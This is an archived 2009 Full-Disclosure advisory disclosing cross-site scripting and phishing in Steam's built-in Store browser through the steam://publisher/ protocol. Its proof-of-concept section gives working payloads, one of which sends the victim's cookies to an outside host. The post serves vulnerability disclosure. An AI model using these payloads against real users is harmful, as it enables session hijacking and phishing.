lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 19 May 2009 19:34:57 -0300
From: Gabriel Lima <gabriel@...andodeseguranca.com>
To: full-disclosure@...ts.grok.org.uk
Subject: STEAM (Valve) - Phishing and Cross-site Scripting
	in internal browser

===========================================
=  APP: STEAM - Valve Software                                   =
===========================================
- STEAM < http://www.steampowered.com >
- Valve Software < http://www.valvesoftware.com >

- Vulnerability Discovery:  Gabriel Lima < gabriel (at) falandodeseguranca.com >
- http://www.falandodeseguranca.com (in portuguese)

- Demo screenshot:
http://www.falandodeseguranca.com/wp-content/uploads/2009/05/steam-xss.jpg
===========================================
- Description -
===========================================

It's possible to input JavaScript\HTML in Steam Store tab (inside
Steam App.), using the Steam
Protocol (steam://) which can be exploited in a html page.

"steam://publisher/<name> Loads the specified publisher catalogue in
the Store. Type the
publisher's name in lowercase, e.g. activision or valve."

When using a publisher name that doesn't exist, Steam Store sends the
value to the search
system, which is vulnerable to XSS.

Store tab in Steam doesn't show the URL. Phishing is possible just
redirecting the victim to
the fake site.

VALVE was contacted in May 10, but they didn't reply anything (May 18).

Works in Internet Explorer.
Tested under Windows XP SP 3 and Windows Vista.


===========================================
- Proof of Concept -
===========================================

[1] Alert with text xss
steam://publisher/<img%20src=a%20onerror=alert('xss')>

[2] PHISING (in this example, it redirects to falandodeseguranca.com )
steam://publisher/<img%20src=a%20
onerror=document.location.href='http'+String.fromCharCode(58,47,47)+'falandodeseguranca.com';>

[3] Getting cookies:
steam://publisher/<img%20src=a%20
onerror=document.location.href='http'+String.fromCharCode(58,47,47)+'falandodeseguranca.com'+String.fromCharCode(47)+document.cookie;>


===========================================
- More Information -
===========================================
The Paper showing how it works, a post with screenshots and a video
could be found here:

http://www.falandodeseguranca.com/2009/05/vulnerabilidade-no-steam-phishing-e-xss-na-steam-store/
(In portuguese)
More information: http://www.falandodeseguranca.com


Contact me: gabriel <at> falandodeseguranca.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ